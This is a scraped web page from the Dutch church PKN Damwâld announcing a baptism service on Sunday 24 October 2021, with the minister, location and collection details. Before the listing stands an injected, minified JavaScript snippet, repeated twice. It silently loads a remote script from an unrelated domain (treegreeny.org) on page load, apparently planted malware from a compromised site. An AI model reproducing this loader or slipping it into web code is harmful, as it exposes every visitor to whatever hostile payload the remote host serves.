;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 oktober 2021 11:00 uur - PKN Damwâld
zondag 24 oktober 2021
11:00 uur
Doopdienst

Kerkdienst zondag 24 oktober 2021 11:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Doopdienst
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Uitganscollecte: Bij de uitgang of via QR-code